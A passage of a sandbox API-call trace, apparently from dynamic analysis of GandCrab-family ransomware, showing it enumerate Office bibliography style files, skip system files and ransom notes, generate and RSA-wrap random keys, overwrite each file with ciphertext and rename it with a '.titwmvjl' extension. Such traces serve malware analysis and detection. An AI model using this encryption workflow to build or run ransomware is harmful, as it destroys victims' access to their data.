lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" [0071.172] lstrlenW (lpString=".titwmvjl") returned 9 [0071.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0071.172] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.172] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.titwmvjl") returned 89 [0071.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0071.173] lstrlenW (lpString=".XSL") returned 4 [0071.173] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.173] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.173] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.173] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0071.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="desktop.ini") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="autorun.inf") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntuser.dat") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="iconcache.db") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="bootsect.bak") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="boot.ini") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntuser.dat.log") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="thumbs.db") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="KRAB-DECRYPT.html") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ntldr") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="NTDETECT.COM") returned -1 [0071.173] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="Bootfont.bin") returned 1 [0071.173] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL") returned 80 [0071.173] lstrlenW (lpString=".XSL") returned 4 [0071.174] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.174] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.174] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.174] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.174] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.175] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.176] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.186] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.186] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.186] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.186] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.187] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.187] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.187] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.187] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.187] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.187] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.188] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.188] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.188] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.189] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.189] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.189] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.189] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.189] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.190] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0071.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.191] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.191] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.192] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.192] GetLastError () returned 0x0 [0071.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.192] CryptDestroyKey (hKey=0x503938) returned 1 [0071.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.192] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.193] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.193] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503738) returned 1 [0071.193] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.193] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.194] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.194] GetLastError () returned 0x0 [0071.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.194] CryptDestroyKey (hKey=0x503738) returned 1 [0071.194] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.195] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.195] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.195] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.195] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x3d639, lpOverlapped=0x0) returned 1 [0071.231] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffc29c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.231] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x3d639, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x3d639, lpOverlapped=0x0) returned 1 [0071.242] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.242] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.243] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.247] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.248] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.248] CloseHandle (hObject=0x2cc) returned 1 [0071.252] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.253] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.253] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.253] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".") returned 1 [0071.253] lstrcmpW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="..") returned 1 [0071.253] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="HarvardAnglia2008OfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" [0071.253] lstrlenW (lpString=".titwmvjl") returned 9 [0071.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0071.253] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.254] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.titwmvjl") returned 109 [0071.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0071.254] lstrlenW (lpString=".xsl") returned 4 [0071.254] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.254] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xsl ") returned 5 [0071.254] lstrcmpiW (lpString1=".xsl", lpString2=".titwmvjl") returned 1 [0071.254] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0071.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="desktop.ini") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="autorun.inf") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntuser.dat") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="iconcache.db") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="bootsect.bak") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="boot.ini") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntuser.dat.log") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="thumbs.db") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="KRAB-DECRYPT.html") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="CRAB-DECRYPT.html") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="KRAB-DECRYPT.txt") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ntldr") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="NTDETECT.COM") returned -1 [0071.254] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="Bootfont.bin") returned 1 [0071.255] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl") returned 100 [0071.255] lstrlenW (lpString=".xsl") returned 4 [0071.255] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.255] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xsl ") returned 5 [0071.255] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.255] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.255] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.256] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.256] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.270] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.270] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.270] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.271] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.271] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.271] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.271] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.271] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.271] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.271] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.272] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.272] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.272] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.272] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.272] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.272] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.273] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.273] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.273] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.273] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503838) returned 1 [0071.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.274] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.274] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.274] GetLastError () returned 0x0 [0071.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.274] CryptDestroyKey (hKey=0x503838) returned 1 [0071.274] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.274] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.275] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.275] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503578) returned 1 [0071.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.275] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.275] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.276] GetLastError () returned 0x0 [0071.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.276] CryptDestroyKey (hKey=0x503578) returned 1 [0071.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.276] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.276] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.276] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.276] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x45882, lpOverlapped=0x0) returned 1 [0071.309] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffba77e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.309] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x45882, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x45882, lpOverlapped=0x0) returned 1 [0071.327] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.327] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.330] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.334] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.335] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.335] CloseHandle (hObject=0x2cc) returned 1 [0071.343] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.344] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.344] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.344] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".") returned 1 [0071.344] lstrcmpW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="..") returned 1 [0071.344] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="IEEE2006OfficeOnline.xsl" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" [0071.344] lstrlenW (lpString=".titwmvjl") returned 9 [0071.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0071.344] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.344] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.titwmvjl") returned 100 [0071.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0071.344] lstrlenW (lpString=".xsl") returned 4 [0071.344] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.344] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xsl ") returned 5 [0071.344] lstrcmpiW (lpString1=".xsl", lpString2=".titwmvjl") returned 1 [0071.344] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.345] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl") returned 91 [0071.345] lstrlenW 